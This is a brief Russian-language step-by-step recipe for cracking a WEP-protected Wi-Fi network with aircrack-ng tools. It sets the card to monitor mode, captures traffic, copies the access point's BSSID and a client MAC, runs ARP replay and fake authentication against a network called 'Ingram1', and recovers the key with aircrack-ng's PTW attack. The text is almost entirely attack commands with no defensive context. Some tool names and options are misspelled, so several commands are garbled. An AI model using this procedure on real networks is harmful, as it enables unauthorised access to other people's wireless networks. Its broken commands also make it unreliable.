ifconfig wlan0 up
iwpriv wlan0 forceprism 1
iwpriv wlan0 rfmontx 1
iwconfig wlan0 mode monitor
airmon-ng start wlan0
Запускаем монитор сети
airodump-ng -c 6 wlan0
Ждем пока появится соединение с клиентом
Выделяем и копируем BSSID, и вставляем его в текстовый документ (новый создаем)
Выделяем и копируем STATION (Client MAC), тоже вставляем в этот документ
В первом окне пишем команду (но не нажимаем Enter!!!):
airplay-ng –airplay -b [BSSID] -h [MAC] wlan0
Создаем второе окно терминала с командой (fake autentication):
airplay-ng -1 0 -a [BSSID] -h [MAC] -e Ingram1 wlan0
Мониторим процесс
Открываем третье окно терминала
airdump-ng -c 6 –bssid [BSSID] -w gramcap wlan0
Когда данные достигнут 80.000-100.000 —
в четвертом окне терминала запускаем PTW функцию aircrack для ключа:
aircrack-ng -z gramcap-01.cap